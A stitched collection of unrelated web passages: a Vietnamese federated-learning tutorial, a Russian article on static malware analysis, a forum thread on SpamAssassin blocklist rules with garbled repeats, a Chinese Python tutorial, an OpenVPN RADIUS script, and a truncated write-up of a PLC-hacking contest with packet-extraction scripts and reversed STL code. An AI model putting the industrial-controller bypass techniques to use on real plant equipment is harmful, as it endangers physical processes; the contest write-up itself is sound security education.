Tất cả các thử nghiệm của chúng tôi cho đến nay chỉ trình bày các chỉ số đào tạo được liên kết - số liệu trung bình trên tất cả các lô dữ liệu được đào tạo trên tất cả các khách hàng trong vòng. Điều này đưa ra những lo ngại bình thường về việc trang bị quá nhiều, đặc biệt là vì chúng tôi đã sử dụng cùng một nhóm khách hàng trên mỗi vòng để đơn giản hóa, nhưng có thêm khái niệm về trang bị quá mức trong các chỉ số đào tạo cụ thể cho thuật toán Trung bình liên kết. Điều này dễ thấy nhất nếu chúng ta tưởng tượng mỗi khách hàng có một lô dữ liệu duy nhất và chúng tôi đào tạo trên lô đó cho nhiều lần lặp (kỷ nguyên). Trong trường hợp này, mô hình cục bộ sẽ nhanh chóng phù hợp chính xác với một lô đó và do đó chỉ số độ chính xác cục bộ mà chúng tôi trung bình sẽ đạt tới 1,0. Do đó, các số liệu đào tạo này có thể được coi là một dấu hiệu cho thấy việc đào tạo đang tiến triển, nhưng không nhiều hơn.
Để thực hiện đánh giá trên dữ liệu được liên kết, bạn có thể xây dựng một phép tính liên kết khác được thiết kế cho mục đích này, bằng cách sử dụng hàm tff.learning.build_federated_evaluation và chuyển hàm tạo mô hình của bạn làm đối số. Lưu ý rằng không giống như với Trung bình liên kết, nơi chúng tôi đã sử dụng MnistTrainableModel , nó đủ để vượt qua MnistModel . Đánh giá không thực hiện giảm độ dốc và không cần phải xây dựng trình tối ưu hóa.
Đối với thử nghiệm và nghiên cứu, khi bộ dữ liệu kiểm tra tập trung có sẵn, Học liên kết cho Tạo văn bản trình diễn một tùy chọn đánh giá khác: lấy các trọng số được đào tạo từ học liên kết, áp dụng chúng vào mô hình Keras chuẩn, sau đó chỉ cần gọi tf.keras.models.Model.evaluate() trên tập dữ liệu tập trung.
evaluation = tff.learning.build_federated_evaluation(MnistModel)
Bạn có thể kiểm tra chữ ký kiểu trừu tượng của hàm đánh giá như sau.
str(evaluation.type_signature)
'(<server_model_weights=<trainable=<float32[784,10],float32[10]>,non_trainable=<>>@SERVER,federated_dataset={<x=float32[?,784],y=int32[?,1]>*}@CLIENTS> -> <num_examples=float32@SERVER,loss=float32@SERVER,accuracy=float32@SERVER>)'
Không cần quan tâm đến các chi tiết tại thời điểm này, chỉ cần lưu ý rằng nó có dạng chung sau đây, tương tự như tff.templates.IterativeProcess.next nhưng có hai điểm khác biệt quan trọng. Đầu tiên, chúng tôi không trả về trạng thái máy chủ, vì đánh giá không sửa đổi mô hình hoặc bất kỳ khía cạnh nào khác của trạng thái - bạn có thể coi nó là trạng thái không trạng thái. Thứ hai, đánh giá chỉ cần mô hình và không yêu cầu bất kỳ phần nào khác của trạng thái máy chủ có thể được liên kết với đào tạo, chẳng hạn như các biến trình tối ưu hóa.
SERVER_MODEL, FEDERATED_DATA -> TRAINING_METRICS
Hãy gọi đánh giá về trạng thái mới nhất mà chúng tôi đạt được trong quá trình huấn luyện. Để trích xuất mô hình được đào tạo mới nhất từ trạng thái máy chủ, bạn chỉ cần truy cập thành viên .model , như sau.
train_metrics = evaluation(state.model, federated_train_data)
Đây là những gì chúng tôi nhận được. Lưu ý rằng những con số trông tốt hơn một chút so với những gì được báo cáo bởi vòng đào tạo cuối cùng ở trên. Theo quy ước, các chỉ số đào tạo được báo cáo bởi quá trình đào tạo lặp đi lặp lại thường phản ánh hiệu suất của mô hình ở đầu vòng đào tạo, do đó, các chỉ số đánh giá sẽ luôn đi trước một bước.
str(train_metrics)
'<num_examples=4860.0,loss=1.7142657041549683,accuracy=0.38683128356933594>'
Bây giờ, hãy biên dịch một mẫu thử nghiệm của dữ liệu liên hợp và chạy lại đánh giá trên dữ liệu thử nghiệm. Dữ liệu sẽ đến từ cùng một mẫu người dùng thực, nhưng từ một tập dữ liệu riêng biệt.
federated_test_data = make_federated_data(emnist_test, sample_clients)
len(federated_test_data), federated_test_data[0]
(10, <DatasetV1Adapter shapes: OrderedDict([(x, (None, 784)), (y, (None, 1))]), types: OrderedDict([(x, tf.float32), (y, tf.int32)])>)
test_metrics = evaluation(state.model, federated_test_data)
str(test_metrics)
'<num_examples=580.0,loss=1.861915111541748,accuracy=0.3362068831920624>'
Điều này kết thúc hướng dẫn. Chúng tôi khuyến khích bạn chơi với các thông số (ví dụ: kích thước lô, số lượng người dùng, kỷ nguyên, tỷ lệ học tập, v.v.), sửa đổi mã ở trên để mô phỏng đào tạo trên các mẫu ngẫu nhiên của người dùng trong mỗi vòng và khám phá các hướng dẫn khác chúng tôi đã phát triển.
|
Содержание статьи
Инструментарий
HEX-редакторы
Детекторы упаковщиков
Специализированные утилиты для исследования исполняемых файлов Windows
Python-модуль pefile
Yara
Меры предосторожности
Определение типа файла
Поиск в VirusTotal по хешу
Поиск и анализ строк
Анализ информации PE-заголовка
Анализ таблицы импорта
Анализ таблицы экспорта
Анализ таблицы секций
Временная метка компиляции
Анализ ресурсов исполняемого файла
Rich-сигнатура
Заключение
В целом, если говорить про анализ исполняемых файлов, можно выделить два подхода — это статический анализ и динамический анализ.
Статический анализ предполагает анализ файла без его запуска на выполнение. Он может быть базовым — в этом случае мы не анализируем непосредственно инструкции процессора в файле, а производим поиск нетипичных для обычных файлов артефактов (например, таких как строки или названия и последовательности API-функций), либо расширенным — в этом случае файл дизассемблируется и производится исследование инструкций, поиск их характерных для вредоносных программ последовательностей и определение того, что именно делала программа.
Динамический анализ заключается в исследовании файла с его запуском в системе. Он тоже может быть базовым и расширенным. Базовый динамический анализ — это исследование файла с его запуском без использования средств отладки, он заключается в отслеживании событий, связанных с этим файлом (например, обращение к реестру, дисковые операции, взаимодействие с сетью и т. п.). Расширенный динамический анализ заключается в исследовании поведения запущенного файла с применением средств отладки.
В этой статье я расскажу о базовых техниках статического анализа. Его преимущества:
позволяет получить результат достаточно быстро;
безопасен для системы при соблюдении минимальных мер предосторожности;
не требует подготовки специальной среды.
Основной недостаток базового статического анализа — это его низкая эффективность при анализе и распознавании сложных вредоносных программ, например упакованных неизвестным упаковщиком или использующих полное либо частичное шифрование файла с применением продвинутых алгоритмов.
Инструментарий
HEX-редакторы
Один из основных инструментов статического базового анализа — это HEX-редактор. Их много, но в первую очередь необходимо отметить Hiew. Это безусловный лидер и бестселлер. Помимо непосредственно функций HEX-редактора, в нем реализовано еще много дополнительных возможностей, связанных с анализом файла: это и дизассемблер, и просмотрщик секций импорта и экспорта, и анализатор заголовка исполняемых файлов. Главный недостаток — все это не бесплатно (хотя и весьма недорого — от 555 рублей).
Детекторы упаковщиков
Если есть подозрение, что файл упакован, то с помощью детектора упаковщиков можно попытаться определить, какой упаковщик при этом использовался, и попробовать распаковать исследуемый файл. Долгое время безусловным лидером здесь была программа PEiD, и в принципе можно пользоваться и ей, однако поддержка давно прекращена и новых сигнатур для определения типов упаковщика уже никто не выпускает. Альтернатива — Exeinfo PE.
Эта программа, помимо детекта упаковщиков, имеет еще много других функций для анализа исполняемых файлов Windows, и во многих случаях можно обойтись ей одной.
Специализированные утилиты для исследования исполняемых файлов Windows
Программа CFF Explorer из пакета Explorer Suite — это настоящий швейцарский нож для исследователя PE-файлов. Позволяет получить огромное количество разнообразной информации обо всех компонентах структуры PE-файла и, помимо прочего, может служить HEX-редактором.
Так что настоятельно рекомендую CFF Explorer, тем более что программа бесплатная.
Python-модуль pefile
Python-модуль pefile позволит обойтись при анализе PE-файлов исключительно интерпретатором Python. С ним практически все операции по базовому статическому анализу можно реализовать путем написания небольших скриптов. Прелесть всего этого в том, что заниматься исследованием PE-файлов можно в Linux.
Модуль присутствует в PyPi, и установить его можно через pip:
pip install pefile
Yara
Ну и в завершение всего списка весьма популярный и востребованный инструмент, ставший своеобразным стандартом в среде антивирусной индустрии, — проект Yara. Разработчики позиционируют его как инструмент, который помогает исследователям малвари идентифицировать и классифицировать вредоносные сэмплы. Исследователь может создать описания для разного типа малвари в виде так называемых правил, используя текстовые или бинарные паттерны.
Меры предосторожности
Чтобы обезопасить систему при проведении базового статического анализа подозрительных файлов, необходимо:
установить запрет на операцию чтения и выполнения анализируемого файла (вкладка «Безопасность» в контекстном меню «Свойства»);
сменить разрешение файла с .exe на какое-нибудь другое (или вообще убрать расширение анализируемого файла);
не пытаться открыть файл текстовыми процессорами и браузерами.
Можно обойтись этими мерами и не использовать виртуальную среду, хотя для полной безопасности можешь установить, например, Virtual Box и проводить анализ в нем (тем более что при динамическом анализе без виртуалки, как правило, не обойтись).
Определение типа файла
Я думаю, тебе известно, что признак PE-файла в Windows — это не только расширение .exe, .dll, .drv или .sys. Внутри него содержатся и другие отличительные черты. Первая из них — это сигнатура из байт вида MZ (или 0x4d, 0x5a в шестнадцатеричном представлении) в самом начале файла. Вторая — сигнатура также из двух байт PE и двух нулевых байтов следом (или 0x50, 0x45, 0x00, 0x00 в шестнадцатеричном представлении).
Смещение этой сигнатуры относительно начала файла записано в так называемом DOS-заголовке в поле e_lfanew, которое находится по смещению 0x3c от начала файла.
По большому счету наличие этих двух сигнатур в файле и подходящее расширение свидетельствует о том, что перед нами именно PE-файл, однако при желании можно посмотреть еще значение поля Magic опционального заголовка (Optional Header). Это значение находится по смещению 0x18 относительно начала сигнатуры PE. Значение этого поля определяет разрядность исполняемого файла:
значение 0x010b говорит о том, что файл 32-разрядный (помни, что в памяти числа располагаются с обратной последовательностью байтов, сначала младший байт и далее старшие байты, то есть число 0x010b будет представлено последовательностью 0x0b, 0x01);
значение 0x020b говорит о том, что файл 64-разрядный.
Посмотреть это все можно несколькими способами. Первый — с помощью HEX-редактора.
Второй — используя CFF Explorer или Exeinfo PE. Они наглядно показывают значения указанных сигнатур.
Третий способ — использовать возможности Python, запустив такой скрипт:
with open(<путь к файлу>, 'rb') as file:
# прочитаем первые 1000 байт файла (больше и не надо)
buffer = file.read(1000)
e_ifanew = int.from_bytes(buffer[0x3c:0x40], byteorder='little')
mz_signature = buffer[0x0:0x2]
pe_signature = buffer[e_ifanew:e_ifanew + 0x4]
magic = buffer[e_ifanew + 0x18:e_ifanew + 0x1a]
if mz_signature == b'MZ' and pe_signature == b'PE\x00\x00':
if magic == b'\x0b\x01':
print('Файл', sys.argv[1], 'является исполнимым PE32 файлом Windows.')
elif magic == b'\x0b\x02':
print('Файл', sys.argv[1], 'является исполнимым PE64 файлом Windows.')
else:
print('Файл', sys.argv[1],'не является PE файлом Windows.')
Или можешь использовать вот такое правило для Yara:
import "pe" //импортируем Yara-модуль pe
rule is_pe_file
{
strings:
$MZ_signature = "MZ"
condition:
($MZ_signature at 0) and (pe.is_32bit() or pe.is_64bit())
}
Поиск в VirusTotal по хешу
Отправить на VirusTotal для проверки можно не только сам файл, но и его хеш (md5, sha1 или sha256). В этом случае, если такой же файл уже анализировался, VirusTotal покажет результаты этого анализа, при этом сам файл на VirusTotal мы не засветим.
Думаю, как узнать хеш файла, ты прекрасно знаешь. В крайнем случае можно написать небольшой скрипт на Python:
import hashlib
with open(<путь к файлу>, 'rb') as file:
buffer = file.read()
print('md5 =', hashlib.md5(buffer).hexdigest())
print('sha1 =', hashlib.sha1(buffer).hexdigest())
print('sha256 =', hashlib.sha256(buffer).hexdigest())
Результат подсчета хеша шлем на VirusTotal либо применяем мои рекомендации из статьи «Тотальная проверка. Используем API VirusTotal в своих проектах» и автоматизируем этот процесс с помощью небольшого скрипта на Python.
import sys
import requests
## будем использовать 2-ю версию API VirusTotal
api_url = 'https://www.virustotal.com/vtapi/v2/file/report'
## не забудь про ключ доступа к функциям VirusTotal
params = dict(apikey=<ключ доступа к API VirusTotal>, resource=str(sys.argv[1]))
response = requests.get(api_url, params=params)
if response.status_code == 200:
result = response.json()
if result['response_code'] == 1:
print('Обнаружено:', result['positives'], '/', result['total'])
print('Результаты сканирования:')
for key in result['scans']:
print('\t' + key, '==>', result['scans'][key]['result'])
elif result['response_code'] == -2:
print('Запрашиваемый объект находится в очереди на анализ.')
elif result['response_code'] == 0:
print('Запрашиваемый объект отсутствует в базе VirusTotal.')
else:
print('Ошибка ответа VirusTotal.')
else:
print('Ошибка ответа VirusTotal.')
Как видишь, скрипт получает значение хеша, переданного в виде аргумента командной строки, формирует все нужные запросы для VirusTotal и выводит результаты анализа.
Если VirusTotal выдал в ответ какие-нибудь результаты анализа, это значит, что исследуемый файл уже кто-то загружал для анализа и его можно загрузить туда повторно и получить более актуальные результаты, на чем анализ можно и завершать. Но вот если VirusTotal не найдет файла в базах, тогда есть смысл идти дальше.
Продолжение доступно только участникам
Вариант 1. Присоединись к сообществу «Xakep.ru», чтобы читать все материалы на сайте
Членство в сообществе в течение указанного срока откроет тебе доступ ко ВСЕМ материалам «Хакера», позволит скачивать выпуски в PDF, отключит рекламу на сайте и увеличит личную накопительную скидку! Подробнее
Вариант 2. Открой один материал
Заинтересовала статья, но нет возможности стать членом клуба «Xakep.ru»? Тогда этот вариант для тебя! Обрати внимание: этот способ подходит только для статей, опубликованных более двух месяцев назад.
Я уже участник «Xakep.ru»
|
Hi, i have a problem (no, all are running very well, but thats the problem), some mails coming form outside to the users in my exim installation are marked as "spam" or are in a "blacklist", but its a "real" mail.
The default config of vestacp (i have debian installed) all mails marked as spam are dropped, these mails dont going to spam folder so... why is .spam folder created? Ô.ö
I need to mark these mails as spam and move them to spam folder, how i can do it?
Thanks!
UPDATE**
Solved, added all of these, if you configure the blacklists on SpamAssassin, mail marked as spam should go now to spam folder (change deny to warn the rule in exim too!):
Add to /etc/spamassassin/local.cf
The default config of vestacp (i have debian installed) all mails marked as spam are dropped, these mails dont going to spam folder so... why is .spam folder created? Ô.ö
I need to mark these mails as spam and move them to spam folder, how i can do it?
Thanks!
UPDATE**
Solved, added all of these, if you configure the blacklists on SpamAssassin, mail marked as spam should go now to spam folder (change deny to warn the rule in exim too!):
Add to /etc/spamassassin/local.cf
Code: Select all
header RCVD_IN_ZENSPAMHAUS eval:check_rbl('zenspamhaus-lastexternal', 'zen.spamhaus.org.')
describe RCVD_IN_ZENSPAMHAUS Relay is listed in zen.spamhaus.org
tflags RCVD_IN_ZENSPAMHAUS net
score RCVD_IN_ZENSPAMHAUS 3.0
header RCVD_IN_XMLSPAMHAUS eval:check_rbl('xblspamhaus-lastexternal', 'xbl.spamhaus.org.')
describe RCVD_IN_XMLSPAMHAUS Relay is listed in xbl.spamhaus.org
tflags RCVD_IN_XMLSPAMHAUS net
score RCVD_IN_XMLSPAMHAUS 3.0
header RCVD_IN_SBLSPAMHAUS eval:check_rbl('sblspamhaus-lastexternal', 'sbl.spamhaus.org.')
describe RCVD_IN_SBLSPAMHAUS Relay is listed in sbl.spamhaus.org
tflags RCVD_IN_SBLSPAMHAUS net
score RCVD_IN_SBLSPAMHAUS 3.0
header RCVD_IN_PSBSURRIEL eval:check_rbl('psblsurriel-lastexternal', 'psbl.surriel.com.')
describe RCVD_IN_PSBSURRIEL Relay is listed in psbl.surriel.com
tflags RCVD_IN_PSBSURRIEL net
score RCVD_IN_PSBSURRIEL 3.0
header RCVD_IN_BARRACUDACEN eval:check_rbl('bbarracuda-lastexternal', 'b.barracudacentral.org.')
describe RCVD_IN_BARRACUDACEN Relay is listed in b.barracudacentral.org
tflags RCVD_IN_BARRACUDACEN net
score RCVD_IN_BARRACUDACEN 3.0
header RCVD_IN_DULSORBS eval:check_rbl('dnsblsorbs-lastexternal', 'dul.dnsbl.sorbs.net.')
describe RCVD_IN_DULSORBS Relay is listed in dul.dnsbl.sorbs.net
tflags RCVD_IN_DULSORBS net
score RCVD_IN_DULSORBS 3.0
header RCVD_IN_SPAMFABEK eval:check_rbl('ssfabek-lastexternal', 'spamsources.fabek.dk.')
describe RCVD_IN_SPAMFABEK Relay is listed in spamsources.fabek.dk
tflags RCVD_IN_SPAMFABEK net
score RCVD_IN_SPAMFABEK 3.0
header RCVD_IN_CBLABUSEAT eval:check_rbl('abuseat-lastexternal', 'cbl.abuseat.org.')
describe RCVD_IN_CBLABUSEAT Relay is listed in cbl.abuseat.org
tflags RCVD_IN_CBLABUSEAT net
score RCVD_IN_CBLABUSEAT 3.0
header RCVD_IN_L1APEWS eval:check_rbl('apews-lastexternal', 'l1.apews.org.')
describe RCVD_IN_L1APEWS Relay is listed in l1.apews.org
tflags RCVD_IN_L1APEWS net
score RCVD_IN_L1APEWS 3.0
header RCVD_IN_BLSPAMCANIBAL eval:check_rbl('spamcannibal-lastexternal', 'bl.spamcannibal.org.')
describe RCVD_IN_BLSPAMCANIBAL Relay is listed in bl.spamcannibal.org
tflags RCVD_IN_BLSPAMCANIBAL net
score RCVD_IN_BLSPAMCANIBAL 3.0
header RCVD_IN_ANONMAILS eval:check_rbl('anonmails-lastexternal', 'spam.dnsbl.anonmails.de.')
describe RCVD_IN_ANONMAILS Relay is listed in spam.dnsbl.anonmails.de
tflags RCVD_IN_ANONMAILS net
score RCVD_IN_ANONMAILS 3.0
https://github.com/SS88UK/SpamAssassinRulesMeow wrote:So, where is it?SS88 wrote:Noted will do!sacredwebsite wrote:How about a gist or a git repo to keep your changes/updates recent to one location for future references?
Sorry for being slow! I'm trying to get everything on to Github as quickly as I can.
The default config of vestacp (i have debian installed) all mails marked as spam are dropped, these mails dont going to spam folder so... why is .spam folder created? Ô.öSS88 wrote: ↑Tue Apr 26, 2016 1:03 amHello VestaCP Community!
I have now merged this topic to GitHub. I am reluctant to keep it updated on VestaCP forums - but it will forever stay updated on GitHub.
https://github.com/SS88UK/Funny Wifi name SpamAssassinRules
Once you have installed the rules and restarted SpamAssassin the rules will help reduce spam on your server.
I need to mark these mails as spam and move them to spam folder, how i can do it?
Thanks!
UPDATE**
Solved, added all of these, if you configure the blacklists on SpamAssassin, mail marked as spam should go now to spam folder (change deny to warn the rule in exim too!):
Add to /etc/spamassassin/local.cf
Need to be careful. Saw off-the-shelf software http://www.testelium.com. They have statistics on the mailing list and spam report. + universal server around the world. Tell me how to release such an algorithm for your application (you need to send notifications to users, send data from a computer). Maybe there is a link to something like a githab?
|
软硬件环境
windows 10 64bit
anaconda3 with python 3.7
视频看这里
此处是youtube的播放链接,需要科学上网。喜欢我的视频,请记得订阅我的频道,打开旁边的小铃铛,点赞并分享,感谢您的支持。
In [1]: type(None)
Out[1]: NoneType
需要注意的是,None是NoneType数据类型的唯一值。也就是说,我们不能再创建其它NoneType类型的变量,但是可以将None赋值给任何变量。如果希望变量中存储的东西不与任何其它值混淆,就可以使用None
None既不表示0, 也和False不同,它表示没有值,也就是空值。这里的空值并不代表空对象,如[]、'',可以看下面的示例
In [2]: None is ''
Out[2]: False
In [3]: None is []
Out[3]: False
In [4]: type('')
Out[4]: str
In [5]: type([])
Out[5]: list
如果从万物皆对象这点来理解,就更好理解了。[]是list对象,而''是str对象。
如果None和if一起使用的话,None永远是False,整个条件语句的值就是False
In [8]: if None:
...: print('True')
...: else:
...: print('False')
...:
False
在方法中,如果没有显式返回值,默认情况下返回的是None,来看个示例
In [9]: def func(str):
...: print(str)
...:
In [10]: a = func("Hello python.")
Hello python.
In [11]: type(a)
Out[11]: NoneType
|
The difficult part was to figure out right config syntax, the only one worked below:
auth-user-pass-verify "C:/Python27/python.exe user-auth.py" via-env
The most surprising thing was:
OpenVPN cannot run python (or vbs) script without crouches!
user-auth.py
Code: Select all
#!/usr/bin/python
import os
import sys
import socket
import pyrad.packet
from pyrad.client import Client
from pyrad.dictionary import Dictionary
srv=Client(server="server_ip", secret="some_s3cret", dict=Dictionary("dictionary"))
req=srv.CreateAuthPacket(code=pyrad.packet.AccessRequest, User_Name=os.environ.get('username'))
req["User-Password"]=req.PwCrypt(os.environ.get('password'))
try:
reply=srv.SendPacket(req)
except pyrad.client.Timeout:
print "RADIUS server does not reply"
sys.exit(1)
except socket.error, error:
print "Network error: " + error[1]
sys.exit(1)
if reply.code==pyrad.packet.AccessAccept:
print "access accepted"
sys.exit(0)
else:
print "access denied"
sys.exit(1)
|
По следам Industrial Ninja: как взламывали ПЛК на Positive Hack Days 9
Блог компании Positive Technologies,
Информационная безопасность,
Спортивное программирование,
IT-инфраструктура
На прошедшем PHDays 9 мы проводили соревнование по взлому завода по перекачке газа — конкурс Industrial Ninja. На площадке было три стенда с различными параметрами безопасности (No Security, Low Security, High Security), эмулирующих одинаковый индустриальный процесс: в воздушный шар закачивался (а потом спускался) воздух под давлением.
Несмотря на разные параметры безопасности, аппаратный состав стендов был одинаков: ПЛК Siemens Simatic серии S7-300; кнопка аварийного сдува и прибор измерения давления (подсоединены к цифровым входам ПЛК (DI)); клапаны, работающие на накачку и спуск воздуха (подсоединены к цифровым выходам ПЛК (DO)) — см. рисунок ниже.
ПЛК, в зависимости от показаний давления и в соответствии со своей программой, принимал решение о сдуве или надуве шарика (открывал и закрывал соответствующие клапаны). Однако на всех стендах был предусмотрен режим ручного управления, который давал возможность управлять состояниями клапанов без каких-либо ограничений.
Стенды отличались сложностью включения данного режима: на незащищенном стенде сделать это было проще всего, а на стенде High Security, соответственно, сложнее.
За два дня были решены пять из шести задач; участник, занявший первое место, заработал 233 балла (он потратил на подготовку к конкурсу неделю). Тройка призеров: I место — a1exdandy, II — Rubikoid, III — Ze.
Однако во время PHDays никто из участников не смог одолеть все три стенда, поэтому мы решили сделать онлайн-конкурс и в начале июня опубликовали самое сложное задание. Участники должны были за месяц выполнить задание, найти флаг, подробно и интересно описать решение.
Под катом мы публикуем разбор лучшего решения задания из присланных за месяц, его нашел Алексей Коврижных (a1exdandy) из компании Digital Security, который занял I место в конкурсе во время PHDays. Ниже мы приводим его текст с нашими комментариями.
Первоначальный анализ
Итак, в задании был архив с файлами:
block_upload_traffic.pcapng
DB100.bin
hints.txt
Файл hints.txt содержит необходимые сведения и подсказки для решения задания. Вот его содержимое:
Петрович мне вчера рассказал, что из PlcSim можно загрузить блоки в Step7.
На стенде использовался ПЛК Siemens Simatic серии S7-300.
PlcSim — это эмулятор ПЛК, позволяющий выполнять и отлаживать программы для ПЛК Siemens S7.
Файл DB100.bin, судя по всему, содержит блок данных DB100 ПЛК: 00000000: 0100 0102 6e02 0401 0206 0100 0101 0102 ....n........... 00000010: 1002 0501 0202 2002 0501 0206 0100 0102 ...... ......... 00000020: 0102 7702 0401 0206 0100 0103 0102 0a02 ..w............. 00000030: 0501 0202 1602 0501 0206 0100 0104 0102 ................ 00000040: 7502 0401 0206 0100 0105 0102 0a02 0501 u............... 00000050: 0202 1602 0501 0206 0100 0106 0102 3402 ..............4. 00000060: 0401 0206 0100 0107 0102 2602 0501 0202 ..........&..... 00000070: 4c02 0501 0206 0100 0108 0102 3302 0401 L...........3... 00000080: 0206 0100 0109 0102 0a02 0501 0202 1602 ................ 00000090: 0501 0206 0100 010a 0102 3702 0401 0206 ..........7..... 000000a0: 0100 010b 0102 2202 0501 0202 4602 0501 ......".....F... 000000b0: 0206 0100 010c 0102 3302 0401 0206 0100 ........3....... 000000c0: 010d 0102 0a02 0501 0202 1602 0501 0206 ................ 000000d0: 0100 010e 0102 6d02 0401 0206 0100 010f ......m......... 000000e0: 0102 1102 0501 0202 2302 0501 0206 0100 ........#....... 000000f0: 0110 0102 3502 0401 0206 0100 0111 0102 ....5........... 00000100: 1202 0501 0202 2502 0501 0206 0100 0112 ......%......... 00000110: 0102 3302 0401 0206 0100 0113 0102 2602 ..3...........&. 00000120: 0501 0202 4c02 0501 0206 0100 ....L.......
Судя по названию, файл block_upload_traffic.pcapng содержит дамп трафика загрузки блоков на ПЛК.
Стоит отметить, что этот дамп трафика на площадке конкурса во время конференции получить было немного сложнее. Для этого необходимо было разобраться в скрипте из файла проекта для TeslaSCADA2. Из него можно было понять, где находится зашифрованный с помощью RC4 дамп и какой ключ необходимо использовать для его расшифровки. Дампы блоков данных на площадке можно было получить с помощью клиента протокола S7. Я для этого использовал демоклиент из пакета Snap7.
Извлечение блоков обработки сигнала из дампа трафика
Взглянув на содержимое дампа, можно понять, что в нем передаются блоки обработки сигнала OB1, FC1, FC2 и FC3:
Необходимо извлечь эти блоки. Это можно сделать, например, следующим скриптом, предварительно сконвертировав трафик из формата pcapng в pcap:
#!/usr/bin/env python2
import struct
from scapy.all import *
packets = rdpcap('block_upload_traffic.pcap')
s7_hdr_struct = '>BBHHHHBB'
s7_hdr_sz = struct.calcsize(s7_hdr_struct)
tpkt_cotp_sz = 7
names = iter(['OB1.bin', 'FC1.bin', 'FC2.bin', 'FC3.bin'])
buf = ''
for packet in packets:
if packet.getlayer(IP).src == '10.0.102.11':
tpkt_cotp_s7 = str(packet.getlayer(TCP).payload)
if len(tpkt_cotp_s7) < tpkt_cotp_sz + s7_hdr_sz:
continue
s7 = tpkt_cotp_s7[tpkt_cotp_sz:]
s7_hdr = s7[:s7_hdr_sz]
param_sz = struct.unpack(s7_hdr_struct, s7_hdr)[4]
s7_param = s7[12:12+param_sz]
s7_data = s7[12+param_sz:]
if s7_param in ('\x1e\x00', '\x1e\x01'): # upload
buf += s7_data[4:]
elif s7_param == '\x1f':
with open(next(names), 'wb') as f:
f.write(buf)
buf = ''
Изучив полученные блоки, можно заметить, что они всегда начинаются с байтов 70 70 (pp). Теперь нужно научиться их анализировать. Подсказка к заданию наводит на мысль, что для этого необходимо использовать PlcSim.
Получение человекочитаемых инструкций из блоков
Для начала попробуем запрограммировать S7-PlcSim, загрузив в него несколько блоков с повторяющимися инструкциями (= Q 0.0) с помощью ПО Simatic Manager, и сохраним полученный в эмуляторе PLC в файл example.plc. Посмотрев на содержимое файла, можно легко определить начало загруженных блоков по сигнатуре 70 70, которую мы обнаружили ранее. Перед блоками, судя по всему, записан размер блока в виде 4-байтового little-endian значения.
После того как мы получили сведения о структуре plc-файлов, появился следующий план действий для чтения программ PLC S7:
С помощью Simatic Manager создаем в S7-PlcSim структуру блоков, аналогичную той, что мы получили из дампа. Должны совпадать размеры блоков (достигается с помощью наполнения блоков нужным количеством инструкций) и их идентификаторы (OB1, FC1, FC2, FC3).
Сохраняем PLC в файл.
Заменяем содержимое блоков в полученном файле на блоки из дампа трафика. Начало блоков определяем по сигнатуре.
Полученный файл загружаем в S7-PlcSim и смотрим содержимое блоков в Simatic Manager.
Замену блоков можно произвести, например, следующим кодом:
with open('original.plc', 'rb') as f:
plc = f.read()
blocks = []
for fname in ['OB1.bin', 'FC1.bin', 'FC2.bin', 'FC3.bin']:
with open(fname, 'rb') as f:
blocks.append(f.read())
i = plc.find(b'pp')
for block in blocks:
plc = plc[:i] + block + plc[i+len(block):]
i = plc.find(b'pp', i + 1)
with open('target.plc', 'wb') as f:
f.write(plc)
Алексей пошел по, возможно, более сложному, но все равно правильному пути. Мы предполагали, что участники воспользуются программой NetToPlcSim, чтобы c PlcSim можно было общаться по сети, загрузят блоки в PlcSim через Snap7, а потом скачают эти блоки в виде проекта из PlcSim с помощью среды разработки.
Открыв полученный файл в S7-PlcSim, можно прочитать перезаписанные блоки с помощью Simatic Manager. Основные функции управления устройствами записаны в блоке FC1. Особое внимание привлекает переменная #TEMP0, при включении которой, судя по всему, управление ПЛК переводится в ручной режим на основе значений битовой памяти M2.2 и M2.3. Значение #TEMP0 устанавливается функцией FC3.
Для решения задания необходимо проанализировать функцию FC3 и понять, что нужно сделать, чтобы она вернула логическую единицу.
Блоки обработки сигналов ПЛК на стенде Low Security на площадке конкурса были устроены аналогичным образом, но для установки значения переменной #TEMP0 достаточно было написать строку my ninja way в блок DB1. Проверка значения в блоке была устроена понятно и не требовала глубоких знаний языка программирования блоков. Очевидно, что на уровне High Security добиться ручного управления будет значительно сложнее и необходимо разбираться в тонкостях языка STL (один из способов программирования ПЛК S7).
Реверс блока FC3
Содержимое блока FC3 в STL представлении:
L B#16#0 T #TEMP13 T #TEMP15 L P#DBX 0.0 T #TEMP4 CLR = #TEMP14M015: L #TEMP4 LAR1 OPN DB 100 L DBLG TAR1 <=D JC M016 L DW#16#0 T #TEMP0 L #TEMP6 L W#16#0 <>I JC M00d L P#DBX 0.0 LAR1 M00d: L B [AR1,P#0.0] T #TEMP5 L W#16#1 ==I JC M007 L #TEMP5 L W#16#2 ==I JC M008 L #TEMP5 L W#16#3 ==I JC M00f L #TEMP5 L W#16#4 ==I JC M00e L #TEMP5 L W#16#5 ==I JC M011 L #TEMP5 L W#16#6 ==I JC M012 JU M010M007: +AR1 P#1.0 L P#DBX 0.0 LAR2 L B [AR1,P#0.0] L C#8 *I +AR2 +AR1 P#1.0 L B [AR1,P#0.0] JL M003 JU M001 JU M002 JU M004M003: JU M005M001: OPN DB 101 L B [AR2,P#0.0] T #TEMP0 JU M006M002: OPN DB 101 L B [AR2,P#0.0] T #TEMP1 JU M006M004: OPN DB 101 L B [AR2,P#0.0] T #TEMP2 JU M006M00f: +AR1 P#1.0 L B [AR1,P#0.0] L C#8 *I T #TEMP11 +AR1 P#1.0 L B [AR1,P#0.0] T #TEMP7 L P#M 100.0 LAR2 L #TEMP7 L C#8 *I +AR2 TAR2 #TEMP9 TAR1 #TEMP4 OPN DB 101 L P#DBX 0.0 LAR1 L #TEMP11 +AR1 LAR2 #TEMP9 L B [AR2,P#0.0] T B [AR1,P#0.0] L #TEMP4 LAR1 JU M006M008: +AR1 P#1.0 L B [AR1,P#0.0] T #TEMP3 +AR1 P#1.0 L B [AR1,P#0.0] JL M009 JU M00b JU M00a JU M00cM009: JU M005M00b: L #TEMP3 T #TEMP0 JU M006M00a: L #TEMP3 T #TEMP1 JU M006M00c: L #TEMP3 T #TEMP2 JU M006M00e: +AR1 P#1.0 L B [AR1,P#0.0] T #TEMP7 L P#M 100.0 LAR2 L #TEMP7 L C#8 *I +AR2 TAR2 #TEMP9 +AR1 P#1.0 L B [AR1,P#0.0] T #TEMP8 L P#M 100.0 LAR2 L #TEMP8 L C#8 *I +AR2 TAR2 #TEMP10 TAR1 #TEMP4 LAR1 #TEMP9 LAR2 #TEMP10 L B [AR1,P#0.0] L B [AR2,P#0.0] AW INVI T #TEMP12 L B [AR1,P#0.0] L B 